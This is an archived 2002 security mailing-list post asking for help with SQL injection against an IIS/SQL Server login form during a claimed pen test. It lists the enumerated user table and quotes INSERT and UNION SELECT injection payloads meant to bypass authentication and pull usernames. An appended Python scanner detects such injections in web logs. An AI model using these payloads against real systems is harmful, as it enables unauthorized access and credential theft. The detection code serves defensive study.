sql table data enumeration help please.

From: Gary O'leary-Steele (GaryO@sec-1.com)
Date: Thu May 09 2002 - 12:47:43 PDT


    Hi all,
    
    
    I am currently performing a pen test against a web server using IIS with SQL
    integration. There is a user name and password form which I want to bypass
    and enumerate existing usernames and passwords.
    
    I have discovered the following columns/table data
    
    
    tblusers.ID				uniqueidentifier
    tblusers.createdtimestamp	smalldatetime
    tblusers.sessionID		nvarchar
    tblUsers.LastUpdated		smalldatetime
    tblUsers.LastUpdatedIP		nvarchar
    tblUsers.LastUpdatedBy		uniqueidentifier
    tblUsers.CompanyType		nvarchar
    tblUsers.CompanyID		uniqueidentifier
    tblUsers.Password			nvarchar
    tblUsers.UserName			nvarchar
    tblUsers.Title			nvarchar
    tblUsers.Surname			nvarchar
    tblUsers.Forename			nvarchar
    tblUsers.AddressTo		nvarchar
    tblUsers.Appointment		nvarchar
    tblUsers.DirectPhone		nvarchar
    tblUsers.Mobile			nvarchar
    tblUsers.DirectEmail		nvarchar
    tblUsers.DirectFax		nvarchar
    tblUsers.Signature		The text, ntext, and image data types are invalid in this subquery or aggregate expression.
    tblUsers.Address1		nvarchar
    tblUsers.Address2		nvarchar
    tblUsers.Address3		nvarchar
    tblUsers.Address4		nvarchar
    tblUsers.Address5		nvarchar
    tblUsers.PostCode		nvarchar
    tblUsers.HomePhone		nvarchar
    tblUsers.UserAccess		bit
    
    I want to update the table to bypass the auth screen
    
    I have tried
    
    -------------
    www.target.comUserName='insert into
    tblusers(createdtimestamp,sessionID,LastUpdated,LastUpdatedIP,LastUpdatedBy,
    CompanyType,CompanyID,Password,username,title,surname,forename,AddressTo,App
    ointment,DirectPhone,Mobile,DirectEmail,directfax,signature,address1,address
    2,postcode,Homephone,UserAccess) values ('Oct 31 2000 8:52PM','7654','Oct 31
    2000
    8:52PM','127.0.0.1','','securitycompany','','test','test','mr','oleary','gar
    y','addrto','appointment','01131234567','07796698919','garyo@sec-1.com',0113
    1234567','sig','123','456','ls287sr','01132297541',1)--
    
    ------------
    
    But had no joy
    
    In an attempt to gain access to data held with the username and password
    fields I have tried
    
    www.target.com/UserName='Union select 1,1,1,1,1,1,1,1,min(UserName) from
    tblusers where username >'a'--&password=hacker
    
    but get "Operand type clash: uniqueidentifier is incompatible with int"
    
    
    Any help would be greatly appreciated
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
    Service. For more information on SecurityFocus' SIA service which
    automatically alerts you to the latest security vulnerabilities please see:
    https://alerts.securityfocus.com/
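
For defenders, requests shaped like the two quoted in the message above stand out in web-server logs once the query string is decoded. The following is an added example, not part of the original post: a small Python check run over constructed request URIs. The `/login.asp` path, the sample values and the rule names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample request URIs (not taken from any real log).
SAMPLE_REQUESTS = [
    "/login.asp?UserName=alice&password=s3cret",
    "/login.asp?UserName=%27Union%20select%201,1,min(UserName)%20from%20tblusers--&password=x",
    "/login.asp?UserName=%27insert+into+tblusers(username)+values+(%27t%27)--&password=x",
    "/login.asp?UserName=o%27leary&password=x",  # legitimate apostrophe, must not alert
]

# Hypothetical rule names; patterns are applied to the URL-decoded parameter value.
RULES = {
    # A quote that closes the string literal, followed directly by a SQL verb.
    "quote_then_sql_keyword": re.compile(
        r"'\s*(union|select|insert|update|delete|having|group\s+by)\b", re.I),
    # A quote somewhere in the value and a comment marker cutting off the rest.
    "trailing_sql_comment": re.compile(r"'.*--\s*$", re.S),
}

def inspect(uri):
    """Return sorted (parameter, rule) pairs for each decoded query value that matches."""
    hits = []
    for name, value in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
        for rule, pattern in RULES.items():
            if pattern.search(value):
                hits.append((name, rule))
    return sorted(hits)

def scan(uris):
    """Map each suspicious URI to its hits; clean requests are omitted."""
    results = {}
    for uri in uris:
        hits = inspect(uri)
        if hits:
            results[uri] = hits
    return results

if __name__ == "__main__":
    for uri, hits in scan(SAMPLE_REQUESTS).items():
        print(uri, hits)
```

Matching on the decoded value matters: the raw log entry carries `%27` and `+`, so a pattern written against the literal quote and spaces would miss it.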
    


